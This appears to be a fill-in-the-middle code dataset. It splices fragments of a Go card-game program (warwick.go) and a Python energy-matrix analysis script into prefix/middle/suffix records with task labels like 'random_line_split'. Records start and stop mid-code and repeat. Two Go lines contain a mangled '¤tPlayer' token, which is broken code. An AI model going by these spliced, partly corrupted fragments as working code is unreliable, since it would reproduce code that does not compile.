permutation = append(fillOut[0:fillSize], card.TestStock[testStockId]...);
} else {
permutation = rand.Perm(stockSize)
}
for i, v := range permutation {
stock.Cards[i] = &allCards[v]
}
return
}
func main() {
stock, stockSize := buildStock()
var discardPile card.Hand
discardPile.Cards = make([]*card.Card, stockSize)
discardPile.PullPos = -1
var trash card.Hand
trash.Cards = make([]*card.Card, stockSize)
// trash is never pulled from, so no pull position
players := make([]player.Player, 2);
// set up rules about where you can get cards from for different actions
legalBuildFrom := map[int] bool{
player.FromHand: true,
player.FromStorage: true,
player.FromStock: false,
player.FromDiscard: false,
}
// initialize the players
for id := range players {
players[id].Hand = &card.Hand{}
players[id].Hand.Limit = 5
players[id].Hand.Max = 7
// create the hand with an extra 2 slots beyond the limit, which could happen
// if you use a soldier and then do an exchange
players[id].Hand.Cards = make([]*card.Card, players[id].Hand.Max)
// do the initial draw of 5 cards
stock.RandomPull(5, players[id].Hand)
// initize the Tableaus. The Tableau is a map indexed by a card type constant
// the map points to a small hand which is the potential stack of cards as someone upgrades
// there are 10 types of cards, plus 2 storage spots so each slot must be initialized
players[id].Tableau = &card.Tableau{}
players[id].Tableau.Stack = make(map[int] *card.Hand)
players[id].Tableau.Discounts = make([]int, 4)
players[id].Tableau.BuildBonus = 0
players[id].Tableau.AttackBonus = 0
players[id].Tableau.Storage = make([] *card.Card, 2)
players[id].Human = false
players[id].State = "Turn 1:\n"
// the player strategy should be loaded from somewhere. For now, set it all to 32
// instead of 1 value per turn, do 3 columns for beginning, middle and end.
// Value can be set by cost to start with. Value may be adjusted by changes in cost.
// value could be affected at time of spend by what may be discarded as well.
players[id].Strategy = make([][][]int, 3)
for phase := 0; phase <= 2; phase++ {
players[id].Strategy[phase] = make([][]int, 10)
for kind := 0; kind <= 9; kind++ {
players[id].Strategy[phase][kind] = make([]int, 5)
for cost := 1; cost <= 4; cost++ {
players[id].Strategy[phase][kind][cost] = cost * 16 - 1
}
}
}
}
// TODO: this should be an input parameter
players[0].Human = true
turnLimit := 0 // you can use this to cut a game short for dev purposes
turnCount := 0
gameOver := false
// play until the deck runs out
// or until the first player fills everything in their table (soldier doesn't matter)
for (stock.PullPos > -1) && ((turnLimit == 0) || (turnCount < turnLimit)) && !gameOver {
turnCount++
phase := turnToPhase(turnCount)
// for safety
// if you can't build any of the cards in your hand (because those positions are filled), you can get stuck
if turnCount > 29 {
fmt.Println("The game went to 30 turns--ending as a safety")
gameOver = true
}
// turns
var opponent player.Player
for id, currentPlayer := range players {
if id == 0 {
opponent = players[1]
} else {
opponent = players[0]
}
// we keep track of messages to send to the Human player
if opponent.Human {
players[0].State = fmt.Sprintf("Turn: %d\n", turnCount + 2)
}
// if we're coming back to this player and they already have 9 cards, it's time to stop
if currentPlayer.Tableau.Fill == 9 {
gameOver = true
break;
// there is an error here in that if player 1 goes out first, player 0 doesn't get another play
}
// turn order:
// 1. Build
// 2. Attack
// 3. Trash (with Market)
// 4. Draw up to 5 OR discard down to 5
// determine card to build, cost
// determine discards
// do build
// log(2, fmt.Sprintf("Player %d hand: %s", id, currentPlayer.Hand))
// log(2, fmt.Sprintf("Player %d Tableau: %s", id, currentPlayer.Tableau))
builds := 0
// we check it each time, since if you build the card, you get to use it immediately
for builds < (currentPlayer.Tableau.BuildBonus + 1) {
buildPos, cost, upgrade := currentPlayer.PlayerChooses(legalBuildFrom, phase)
var discards []player.Pos
if buildPos.From != player.NoCard {
log(1, fmt.Sprintf("Player %d builds %s for %d", id, currentPlayer.CardByPos(buildPos), cost))
if cost > 0 {
discards = currentPlayer.ChooseDiscards(buildPos, cost, phase)
if logLevel > 1 {
fmt.Println("Player", id, "discards:")
for _, pos := range discards {
fmt.Println(currentPlayer.CardByPos(pos))
}
}
}
kind := currentPlayer.CardByPos(buildPos).Kind
cardValue := currentPlayer.CardByPos(buildPos).Cost
currentPlayer.Build(buildPos, discards, &discardPile, upgrade)
// if it's storage, you get a chance to place a card
if kind == card.Storage {
store(cardValue, &stock, &discardPile, ¤tPlayer, phase);
}
log(2, fmt.Sprintf("currentPlayer %d has %d cards left", id, currentPlayer.Hand.Count))
builds++
} else {
break;
}
}
// When they don't build, and they have cards, check if they'd like to trash and redraw
if builds == 0 {
preResetCount := currentPlayer.Hand.Count
if (currentPlayer.Human && preResetCount > 0 && currentPlayer.HumanWantsRedraw()) || (currentPlayer.Hand.Count == currentPlayer.Hand.Limit) {
// if the computer player can't build, but they have a full hand, they will get stuck. Invoke the hand reset rule
currentPlayer.Hand.Reset()
stock.RandomPull(preResetCount, players[id].Hand)
fmt.Println("Player", id, "dumps their hand and redraws")
// if you recycle your hand, you don't get to do any builds, attacks, exchanges
continue;
}
}
// ------ Attack --------- //
steal := currentPlayer.ChooseAttack(opponent, phase) // steal is a card kind
if steal != -1 {
// log(1, fmt.Sprintf("Player %d uses %s and takes opponent's %s", id, currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal)))
if opponent.Human{
players[0].State += fmt.Sprintf("ALERT: Opponent used a %s to take your %s\n", currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal))
}
opponent.Tableau.RemoveTop(steal, currentPlayer.Hand)
// then loose your attack card
currentPlayer.Tableau.RemoveTop(card.Soldiers, &trash) // TODO: remove to trash, test if it works
}
// ------- TRASH --------- //
cardsTrashed := 0
// TrashBonus measures the amount of cards you can trash in order to draw a new one
if currentPlayer.Tableau.TrashBonus > 0 && currentPlayer.Hand.Count > 0 {
trashPoses := currentPlayer.ChooseTrash(phase)
cardsTrashed = currentPlayer.TrashCards(trashPoses, &trash)
}
// you must trash card to get the draw bonus under the current rules
if (currentPlayer.Tableau.DrawBonus > 0) && (cardsTrashed > 0) {
stock.RandomPull(currentPlayer.Tableau.DrawBonus, players[id].Hand)
log(1, fmt.Sprintf("Player %d bonus draws %d", id, currentPlayer.Tableau.DrawBonus))
}
// ------- DRAW --------- //
// see how many open spots there are in the hand. This may not run at all
currentPlayer.Draw(&discardPile, &stock, phase)
// ------- DISCARD --------- //
// TODO: allow player to choose discard
for currentPlayer.Hand.Count > currentPlayer.Hand.Limit {
fmt.Println("=================== Player", id, "has", currentPlayer.Hand.Count, "cards =================");
trashPos, _ := currentPlayer.LowestValueCard(phase, nil)
currentPlayer.Hand.RemoveCard(trashPos.Index, &trash)
}
// if a human is playing record the state to share with them at the beginning of their turn
// this assumes the human always goes first
if opponent.Human {
players[0].State += fmt.Sprintf("Opponent Tableau:\n%s\n", currentPlayer.Tableau)
players[0].State += fmt.Sprintf("Your Tableau:\n%s\n", opponent.Tableau)
}
}
fmt.Println("----END OF TURN----")
}
// determine the winner
if logLevel > 0 {
vp := make([]int, 2)
for id, currentPlayer := range players {
fmt.Println("Player", id, "Tableau: ", currentPlayer.Tableau)
vp[id] = currentPlayer.VictoryPoints()
}
fmt.Println("Player 0", vp[0], "-", vp[1], "Player 1")
if vp[0] == vp[1] {
fmt.Println("Tie game")
} else if vp[0] < vp[1] {
fmt.Println("Player 1 wins!")
} else {
fmt.Println("Player 0 wins!")
}
}
} | store | identifier_name |
warwick.go | /*
You are building a medieval village. You win by having the most Victory Points (VP), which you get by building
particular buildings. You build by discarding cards. The game is over when one player has built one
of each kind of building (and his opponent gets one more turn), or when the deck runs out.
Buildings:
There are 9 different kinds of building: Civic, Defensive, School, Military, Manufacturing, Supply, Market, Farm and Storage.
Each gives you additional powers. Details are below. There are 2 of each building in the deck.
Soldiers:
You can also recruit a Soldier card, but only up to the level of your current Military building. Like a building, you must
discard as many cards as the level of the soldier, unless you have a farm, which reduces the cost of recruiting Soldiers.
Soldiers can be used to attack the opponent. By discarding a soldier, you may take a card of equal value from your opponent.
If they have a defensive building, you must take the defensive building, and you may only take it if it is of equal or
lesser value.
Additionally, soldiers may be used for defense. They subtract their value from the value of the attacking soldier. If they
have a greater value, both attacking and defending soldiers are discarded. This is optional, you may choose to save your
soldier for attack.
Like buildings, soldiers may be upgraded, but not above the level of the military building.
Storage:
There are 4 spots on the board which can be used for storage, but only if you build the Storage building. You may store as many
cards as the value of the storage building. Cards put into Storage may only be built, they may not be discarded or trashed.
When you build a storage building, the storage slots will be filled, but if you build one of those cards, you can use that
spot to put a card from your hand. If you upgrade your storage, you may be able to fill empty spots from the deck. If the
opponents soldier attacks you and takes your Storage building, he also gets everything you have in storage!
Storage reconsidered: | Storage reconsidered: Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
re2considered: 1: store card on table, 2: store 2nd card, 3: can move card back into hand, 4: fill any open storage spots at the time you build this card
re3considered: with each level, you open a spot that must be immediately filled from the draw, discard or hand
re4considered: 1: open a spot that may be immediately filled from the draw, discard or hand, 2: refill that spot, 3: add another, 4: refill both
Discard vs. Trash
There are two face up piles where cards go after they're used. When building, cards go into the discard. The Market buildings
allow you to draw from the discard pile (you must draw from the top of the pile. You may not look through the pile). When
using the Market buildings you may be able to trash cards to draw cards--cards that go into the trash may never be retrieved.
Soldiers go into the trash when they're used.
Turn order:
1. Build or Upgrade
2. Attack (optional, if Soldier recruited)
3. Store (optional, if Storage built)
4. Trash (optional, if Market built)
5. Hand limit is 5, draw up to 2, or discard
- or -
Trash all cards in hand, and draw the number trashed.
Building and Upgrading:
To build a level 3 building, you need to discard 3 cards. Buildings are built using wood, metal, or stone.
There are buildings that make other buildings made of certain materials cheaper to build. For instance, an Exchange (made of wood)
costs 3, but if you have a Carpentry, it will only cost you 2. If you have a Carpentry and a Sawmill, it will only cost you 1!
Buildings can also be upgraded. If you have a building of one level (say level 1), you can lay the building
of level 2 on top of it (but not the building of level 3 or 4!). That counts as a build, but doesn't cost you
anything.
To start:
Each player gets 5 cards.
*/
package main
import (
"fmt"
"math/rand"
"time"
"github.com/chrislunt/warwick/card"
"github.com/chrislunt/warwick/player"
)
var logLevel = 2
func log(level int, message string) {
if logLevel >= level {
fmt.Println(message);
}
}
func turnToPhase(turn int) (phase int) {
if turn > 6 {
phase = 2
} else if turn > 3 {
phase = 1
} else {
phase = 0
}
return
}
func store(storePower int, stock *card.Hand, discardPile *card.Hand, player *player.Player, phase int) {
var topSpot int
switch {
case storePower == 1 || storePower == 2:
// the player may choose from hand, discard or stock to fill the storage
// if the spot is open, you may refill it
topSpot = 0
case storePower == 3 || storePower == 4:
// a second storage spot opens, fill from stock, discard or hand
// for a 4, refill either open storage spots
topSpot = 1
}
for spot := 0; spot <= topSpot; spot++ {
if (*player).Tableau.Storage[spot] == nil {
storeCard := (*player).ChooseStore(stock, discardPile, phase)
log(1, fmt.Sprintf("Stored in storage %d: %s", spot, storeCard))
(*player).Tableau.Storage[spot] = storeCard
}
}
}
func buildStock() (stock card.Hand, stockSize int) {
rand.Seed( time.Now().UTC().UnixNano() )
// double the deck. This is the canonical reference of all cards.
var allCards = append(card.Deck[:], card.Deck[:]...)
stockSize = len(allCards)
// the stock, which can shrink, is a reference to all cards
stock.Cards = make([]*card.Card, stockSize)
stock.PullPos = stockSize - 1 // the position representing the current position to draw from
/* There are two ways we could randomize, one would be randomize the stock and keep a pointer of where we currently are,
which has an up-front randomization cost, but all subsequent pulls are cheap.
*/
// TODO make this a parameter
testStockId := -1
var permutation []int
if testStockId != -1 {
/* rather than having to specify the whole deck, I allow you to only specify the top of the deck */
fillSize := stockSize - len(card.TestStock[testStockId])
fillOut := rand.Perm(fillSize)
// for easier reading I specify the TestStock in reverse order, so get it ready to go on top
s := card.TestStock[testStockId]
for i, j := 0, len(s)-1; i < j; i, j = i+1, j-1 {
s[i], s[j] = s[j], s[i]
}
permutation = append(fillOut[0:fillSize], card.TestStock[testStockId]...);
} else {
permutation = rand.Perm(stockSize)
}
for i, v := range permutation {
stock.Cards[i] = &allCards[v]
}
return
}
func main() {
stock, stockSize := buildStock()
var discardPile card.Hand
discardPile.Cards = make([]*card.Card, stockSize)
discardPile.PullPos = -1
var trash card.Hand
trash.Cards = make([]*card.Card, stockSize)
// trash is never pulled from, so no pull position
players := make([]player.Player, 2);
// set up rules about where you can get cards from for different actions
legalBuildFrom := map[int] bool{
player.FromHand: true,
player.FromStorage: true,
player.FromStock: false,
player.FromDiscard: false,
}
// initialize the players
for id := range players {
players[id].Hand = &card.Hand{}
players[id].Hand.Limit = 5
players[id].Hand.Max = 7
// create the hand with an extra 2 slots beyond the limit, which could happen
// if you use a soldier and then do an exchange
players[id].Hand.Cards = make([]*card.Card, players[id].Hand.Max)
// do the initial draw of 5 cards
stock.RandomPull(5, players[id].Hand)
// initize the Tableaus. The Tableau is a map indexed by a card type constant
// the map points to a small hand which is the potential stack of cards as someone upgrades
// there are 10 types of cards, plus 2 storage spots so each slot must be initialized
players[id].Tableau = &card.Tableau{}
players[id].Tableau.Stack = make(map[int] *card.Hand)
players[id].Tableau.Discounts = make([]int, 4)
players[id].Tableau.BuildBonus = 0
players[id].Tableau.AttackBonus = 0
players[id].Tableau.Storage = make([] *card.Card, 2)
players[id].Human = false
players[id].State = "Turn 1:\n"
// the player strategy should be loaded from somewhere. For now, set it all to 32
// instead of 1 value per turn, do 3 columns for beginning, middle and end.
// Value can be set by cost to start with. Value may be adjusted by changes in cost.
// value could be affected at time of spend by what may be discarded as well.
players[id].Strategy = make([][][]int, 3)
for phase := 0; phase <= 2; phase++ {
players[id].Strategy[phase] = make([][]int, 10)
for kind := 0; kind <= 9; kind++ {
players[id].Strategy[phase][kind] = make([]int, 5)
for cost := 1; cost <= 4; cost++ {
players[id].Strategy[phase][kind][cost] = cost * 16 - 1
}
}
}
}
// TODO: this should be an input parameter
players[0].Human = true
turnLimit := 0 // you can use this to cut a game short for dev purposes
turnCount := 0
gameOver := false
// play until the deck runs out
// or until the first player fills everything in their table (soldier doesn't matter)
for (stock.PullPos > -1) && ((turnLimit == 0) || (turnCount < turnLimit)) && !gameOver {
turnCount++
phase := turnToPhase(turnCount)
// for safety
// if you can't build any of the cards in your hand (because those positions are filled), you can get stuck
if turnCount > 29 {
fmt.Println("The game went to 30 turns--ending as a safety")
gameOver = true
}
// turns
var opponent player.Player
for id, currentPlayer := range players {
if id == 0 {
opponent = players[1]
} else {
opponent = players[0]
}
// we keep track of messages to send to the Human player
if opponent.Human {
players[0].State = fmt.Sprintf("Turn: %d\n", turnCount + 2)
}
// if we're coming back to this player and they already have 9 cards, it's time to stop
if currentPlayer.Tableau.Fill == 9 {
gameOver = true
break;
// there is an error here in that if player 1 goes out first, player 0 doesn't get another play
}
// turn order:
// 1. Build
// 2. Attack
// 3. Trash (with Market)
// 4. Draw up to 5 OR discard down to 5
// determine card to build, cost
// determine discards
// do build
// log(2, fmt.Sprintf("Player %d hand: %s", id, currentPlayer.Hand))
// log(2, fmt.Sprintf("Player %d Tableau: %s", id, currentPlayer.Tableau))
builds := 0
// we check it each time, since if you build the card, you get to use it immediately
for builds < (currentPlayer.Tableau.BuildBonus + 1) {
buildPos, cost, upgrade := currentPlayer.PlayerChooses(legalBuildFrom, phase)
var discards []player.Pos
if buildPos.From != player.NoCard {
log(1, fmt.Sprintf("Player %d builds %s for %d", id, currentPlayer.CardByPos(buildPos), cost))
if cost > 0 {
discards = currentPlayer.ChooseDiscards(buildPos, cost, phase)
if logLevel > 1 {
fmt.Println("Player", id, "discards:")
for _, pos := range discards {
fmt.Println(currentPlayer.CardByPos(pos))
}
}
}
kind := currentPlayer.CardByPos(buildPos).Kind
cardValue := currentPlayer.CardByPos(buildPos).Cost
currentPlayer.Build(buildPos, discards, &discardPile, upgrade)
// if it's storage, you get a chance to place a card
if kind == card.Storage {
store(cardValue, &stock, &discardPile, ¤tPlayer, phase);
}
log(2, fmt.Sprintf("currentPlayer %d has %d cards left", id, currentPlayer.Hand.Count))
builds++
} else {
break;
}
}
// When they don't build, and they have cards, check if they'd like to trash and redraw
if builds == 0 {
preResetCount := currentPlayer.Hand.Count
if (currentPlayer.Human && preResetCount > 0 && currentPlayer.HumanWantsRedraw()) || (currentPlayer.Hand.Count == currentPlayer.Hand.Limit) {
// if the computer player can't build, but they have a full hand, they will get stuck. Invoke the hand reset rule
currentPlayer.Hand.Reset()
stock.RandomPull(preResetCount, players[id].Hand)
fmt.Println("Player", id, "dumps their hand and redraws")
// if you recycle your hand, you don't get to do any builds, attacks, exchanges
continue;
}
}
// ------ Attack --------- //
steal := currentPlayer.ChooseAttack(opponent, phase) // steal is a card kind
if steal != -1 {
// log(1, fmt.Sprintf("Player %d uses %s and takes opponent's %s", id, currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal)))
if opponent.Human{
players[0].State += fmt.Sprintf("ALERT: Opponent used a %s to take your %s\n", currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal))
}
opponent.Tableau.RemoveTop(steal, currentPlayer.Hand)
// then loose your attack card
currentPlayer.Tableau.RemoveTop(card.Soldiers, &trash) // TODO: remove to trash, test if it works
}
// ------- TRASH --------- //
cardsTrashed := 0
// TrashBonus measures the amount of cards you can trash in order to draw a new one
if currentPlayer.Tableau.TrashBonus > 0 && currentPlayer.Hand.Count > 0 {
trashPoses := currentPlayer.ChooseTrash(phase)
cardsTrashed = currentPlayer.TrashCards(trashPoses, &trash)
}
// you must trash card to get the draw bonus under the current rules
if (currentPlayer.Tableau.DrawBonus > 0) && (cardsTrashed > 0) {
stock.RandomPull(currentPlayer.Tableau.DrawBonus, players[id].Hand)
log(1, fmt.Sprintf("Player %d bonus draws %d", id, currentPlayer.Tableau.DrawBonus))
}
// ------- DRAW --------- //
// see how many open spots there are in the hand. This may not run at all
currentPlayer.Draw(&discardPile, &stock, phase)
// ------- DISCARD --------- //
// TODO: allow player to choose discard
for currentPlayer.Hand.Count > currentPlayer.Hand.Limit {
fmt.Println("=================== Player", id, "has", currentPlayer.Hand.Count, "cards =================");
trashPos, _ := currentPlayer.LowestValueCard(phase, nil)
currentPlayer.Hand.RemoveCard(trashPos.Index, &trash)
}
// if a human is playing record the state to share with them at the beginning of their turn
// this assumes the human always goes first
if opponent.Human {
players[0].State += fmt.Sprintf("Opponent Tableau:\n%s\n", currentPlayer.Tableau)
players[0].State += fmt.Sprintf("Your Tableau:\n%s\n", opponent.Tableau)
}
}
fmt.Println("----END OF TURN----")
}
// determine the winner
if logLevel > 0 {
vp := make([]int, 2)
for id, currentPlayer := range players {
fmt.Println("Player", id, "Tableau: ", currentPlayer.Tableau)
vp[id] = currentPlayer.VictoryPoints()
}
fmt.Println("Player 0", vp[0], "-", vp[1], "Player 1")
if vp[0] == vp[1] {
fmt.Println("Tie game")
} else if vp[0] < vp[1] {
fmt.Println("Player 1 wins!")
} else {
fmt.Println("Player 0 wins!")
}
}
} | Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot | random_line_split |
energy_matrix_analysis.py | """
We wish to explore the relationship between copy number and various
energy matrix statistics, such as disorder (i.e. standard deviation of
score).
"""
from utils import *
from parse_energy_matrices import parse_energy_matrices
from scipy.stats import wilcoxon
#energy_matrices = parse_energy_matrices("energy_matrices.txt")
beta = 1.61
n = 16
G = 100000.0
alpha = 0.5
L = 10
ns_binding_const = -8
base_dict = {b:i for i,b in enumerate("ACGT")}
def score_ref(matrix,seq,ns=True):
"""Score a sequence with a motif. This is a reference
implementation. See score for production implementation"""
specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def score(matrix,seq,ns=True):
"""Score a sequence with a motif."""
#specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
specific_binding = 0
for i in xrange(len(matrix)):
specific_binding += matrix[i][base_dict[seq[i]]]
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def matrix_mean(matrix):
"""Return the mean score for the energy matrix"""
return sum(map(mean,matrix))
def matrix_variance(matrix):
"""Return the variance of the scores for the energy matrix"""
return sum(map(lambda row:variance(row,correct=False),matrix))
def matrix_sd(matrix):
return sqrt(matrix_variance(matrix))
def specific_binding_fraction(matrix,n=10000):
"""What fraction of the time does the tf bind specifically (i.e. < -8kbt)
to a random site?"""
return mean([score(matrix,random_site(10)) < -8 for i in xrange(n)])
def predict_mean_prop(matrix,ns=True):
"""estimate <exp(-beta*score(matrix,site))>
ns: non-specific binding"""
return (product([mean([exp(-beta*ep) for ep in col]) for col in matrix]) +
(exp(-beta*(-8)) if ns else 0)) # kbT
def predict_variance_prop(matrix):
"""estimate Var(exp(-beta*score(matrix,site)))"""
# See: The Variance of the Product of K Random Variables
# Leo A. Goodman | # product(e_of_sqs) - product(esqs), not sum...
# expectation of square
e_of_sqs = [mean([exp(-beta*ep)**2 for ep in col]) for col in matrix]
# square of expectation
esqs = [mean([exp(-beta*ep) for ep in col])**2 for col in matrix]
return product(e_of_sqs) - product(esqs)
def predict_z(matrix,num_sites,ns=True):
return predict_mean_prop(matrix,ns=ns) * num_sites
def predict_z_variance(matrix,num_sites):
return predict_variance_prop(matrix) * num_sites
def mean_variance_plot(filename=None):
means = map(matrix_mean,energy_matrices)
variances = map(matrix_variance,energy_matrices)
plt.scatter(ks,means,label="Mean")
plt.scatter(ks,variances,label="Variance",color='g')
mean_regression = lambda x:poly1d(polyfit(map(log,ks),means,1))(log(x))
variance_regression = lambda x:poly1d(polyfit(map(log,ks),variances,1))(log(x))
plt.plot(*pl(mean_regression,map(iota,range(1,65))))
plt.plot(*pl(variance_regression,map(iota,range(1,65))))
plt.semilogx()
plt.xlabel("Copy Number")
plt.ylabel("kBT,(kBT)^2")
plt.legend(loc=0)
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def specific_binding_fraction_plot(filename=None):
binding_fractions = map(specific_binding_fraction,verbose_gen(energy_matrices))
plt.scatter(ks,binding_fractions)
plt.xlabel("Copy Number")
plt.ylabel("Specific binding fraction")
plt.loglog()
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def max_16_ic(matrix,n=100000):
"""
Compute motif_ic of top 16 of n random sites
"""
width = len(matrix)
sites = [random_site(width) for i in xrange(n)]
scores = map(lambda site:score(matrix,site),sites)
top16 = map(first,sorted(zip(sites,scores),key=lambda(site,score):score)[:16])
return motif_ic(top16)
def matrix_as_psfm(matrix):
"""
convert energy to psfm, assuming uniform probabilities
DEPRECATED: INCOMPLETE
"""
return [[2**(ep-2) for ep in row] for row in matrix]
def predict_site_energy(matrix,n,G,alpha):
"""See blue notebook: 6/27/13"""
#constant which does not depend on sites, matrix
C = 1/beta * log(n/G*(1-alpha)/alpha)
Zb = predict_z(matrix,G)
omega = Zb/G
return C - (1/beta * log(omega))
def predict_zf(matrix,n,G,alpha):
"""Predict sum_{i=1}^n exp(-\beta*E(s))"""
ep_f = predict_site_energy(matrix,n,G,alpha)
return n*exp(-beta*ep_f)
C = 1/beta * (log(n/G*(1-alpha)/alpha) + L * log(4))
def site_error(matrix,site):
"""Compute error for site, given matrix"""
return (score(matrix,site,ns=False)
- C
+ 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)]))
def site_error_optimized(matrix,site):
"""Compute error for site, given matrix"""
return score(matrix,site,ns=False) - C
def sse(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
return sum([site_error(matrix,site)**2
for site in motif])
def sse_optimized(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
#Hoisted computation of K out of site_error
K = 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)])
return sum([(site_error_optimized(matrix,site)+K)**2
for site in motif])
def sse_experiment(motif):
"""Given a collection of sites, can we find a corresponding energy
matrix by gradient descent on sum of squared errors?"""
L = len(matrix)
n = len(motif)
G = 100000.0
alpha = 0.9
def partial_site_error(matrix,site,i,b):
return 2*site_error(matrix,site)*(int(site[i] == b)
- (exp(-beta*matrix[i][base_dict[b]])
/sum([exp(-beta*matrix[i][base_dict[c]])
for c in "ACGT"])))
def partial_sse(matrix,i,b):
return sum([2*site_error(matrix,site)*partial_site_error(matrix,site,i,b)
for site in motif])
def jacobian(matrix):
return [[partial_sse(matrix,i,b) for b in "ACGT"] for i in range(L)]
def grad_desc(matrix,max_its=1000):
step = 0.0001
tolerance = 0.001
current_sse = sse(matrix)
print current_sse
its = 0 # iterations
sses = []
while current_sse > tolerance and its < max_its:
j = jacobian(matrix)
#print j
matrix = matrix_add(matrix,matrix_scalar_mult(-step,j))
current_sse = sse(matrix)
print its,current_sse #,[score(matrix,site,ns=False) for site in motif]
#print matrix
its += 1
sses.append(current_sse)
return matrix,sses
print matrix,motif
return grad_desc([[0]*4 for i in range(L)])
def mutate_matrix(matrix):
"""Mutate the matrix by perturbing one weight by a standard normal"""
L = len(matrix)
r_i = random.randrange(L)
r_j = random.randrange(4)
r = random.gauss(0,1)
return [[matrix[i][j]+r*(i==r_i)*(j==r_j)
for j in range(4)] for i in range(L)]
def propose(matrix,motif):
"""Return a candidate (S,R) system by mutating either the motif or
the matrix"""
if random.random() < 0.5:
return matrix,mutate_motif(motif)
else:
return mutate_matrix(matrix),motif
def mh_experiment(text="",filename=None):
"""Metropolis-Hastings sampling for SSE of (S,R) systems"""
motif = [random_site(L) for i in range(n)]
matrix = [[0,0,0,0] for i in range(L)]
xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=50000)
sses = [sse_optimized(matrix,motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ginis = [motif_gini(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
plt.scatter(ics,sses)
plt.xlabel("Motif Information Content (bits)")
plt.ylabel("Sum Squared Error")
plt.title("Motif IC vs. Sum Squared error: %s " % text)
maybesave(filename)
def ic_vs_gini_scatterplot_exp(trials=100,stopping_crit=1,filename=None):
# redo this properly!
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
# xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
# lambda(matrix,motif):propose(matrix,motif),
# (matrix,motif),
# verbose=True,
# iterations=50000,every=100)
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda: anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
iterations=100000,
stopping_crit = stopping_crit*scale)
xs = [annealed_system() for i in verbose_gen(xrange(trials))]
ginis = [motif_gini(motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,
modulus=1000)]
sa_motifs = [sa_motif_with_desired_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
greedy_motifs = [generate_greedy_motif_with_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
sa_ics = [motif_ic(motif) for motif in sa_motifs]
sa_ginis = [motif_gini(motif) for motif in sa_motifs]
greedy_ics = [motif_ic(motif) for motif in greedy_motifs]
greedy_ginis = [motif_gini(motif) for motif in greedy_motifs]
plt.scatter(ics,ginis,color='b',label="Systems")
plt.scatter(sa_ics,sa_ginis,color='r',label="MCMC")
plt.scatter(greedy_ics,greedy_ginis,color='g',label="Greedy")
print "Systems vs. SA motifs:",wilcoxon(ginis,sa_ginis)
print "Systems vs. greedy motifs:",wilcoxon(ginis,greedy_ginis)
print "Greedy vs. sa motifs:",wilcoxon(sa_ginis,greedy_ginis)
# Systems vs. SA motifs: (75677.0, 2.1175931461637028e-81)
# Systems vs. greedy motifs: (78734.0, 1.2196302463732947e-78)
# Greedy vs. sa motifs: (247043.0, 0.72555385752004398)
maybesave(filename)
print "loaded energy_matrix_analysis"
def mr_pairs_have_less_mi_exp(filename=None):
"""Motifs evolved as M-R pairs have less MI than random motifs
with the same IC"""
trials = 500
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda :anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=100000,
stopping_crit = 0.1*scale)
systems = [annealed_system() for i in xrange(500)]
motifs = map(second,systems)
ics = map(motif_ic,motifs)
control_motifs = [sa_motif_with_desired_ic(ic,0.1,n,L) for ic in verbose_gen(ics)]
mis = map(total_motif_mi,motifs)
control_mis = map(total_motif_mi,control_motifs)
plt.scatter(mis,control_mis)
plt.xlabel("M-R System Mutual Information (bits)")
plt.ylabel("Annealed Motif Mutual Information (bits)")
plt.plot([0,5],[0,5])
maybesave(filename)
#mannwhitneyu(mis,control_mis) -> (47673.0, 1.2864021557444156e-64)
return mis,control_mis | # Page 55 of 54-60
# However, first line of equation 1 is /wrong/. Should be: | random_line_split |
energy_matrix_analysis.py | """
We wish to explore the relationship between copy number and various
energy matrix statistics, such as disorder (i.e. standard deviation of
score).
"""
from utils import *
from parse_energy_matrices import parse_energy_matrices
from scipy.stats import wilcoxon
#energy_matrices = parse_energy_matrices("energy_matrices.txt")
beta = 1.61
n = 16
G = 100000.0
alpha = 0.5
L = 10
ns_binding_const = -8
base_dict = {b:i for i,b in enumerate("ACGT")}
def score_ref(matrix,seq,ns=True):
"""Score a sequence with a motif. This is a reference
implementation. See score for production implementation"""
specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def score(matrix,seq,ns=True):
"""Score a sequence with a motif."""
#specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
specific_binding = 0
